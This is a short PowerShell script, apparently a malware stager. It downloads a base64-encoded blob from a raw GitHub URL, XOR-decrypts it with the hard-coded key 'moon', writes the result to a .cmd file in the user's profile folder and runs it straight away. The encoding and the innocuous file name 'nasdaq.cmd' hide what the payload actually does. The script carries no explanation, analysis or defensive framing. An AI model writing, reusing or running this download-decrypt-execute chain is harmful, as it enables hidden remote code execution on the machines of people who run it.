$u='https://raw.githubusercontent.com/Jakeryan500/a/refs/heads/main/skibidi'

try{
    $k='moon'
    if(!$u -or !$k){throw 'Missing URL or key'}

    $d=(iwr $u -UseBasicParsing -ErrorAction Stop).Content -replace '\s'
    $b=[Convert]::FromBase64String($d)

    $kb=[Text.Encoding]::UTF8.GetBytes($k)
    if(!$kb.Length){throw 'Empty key'}

    $o=[byte[]](0..($b.Length-1)|%{
        $b[$_] -bxor $kb[$_%$kb.Length]
    })

    [IO.File]::WriteAllBytes("$env:USERPROFILE\nasdaq.cmd",$o)



& "$env:USERPROFILE\nasdaq.cmd"

}
catch{
    Write-Host "Error: $($_.Exception.Message)"
}
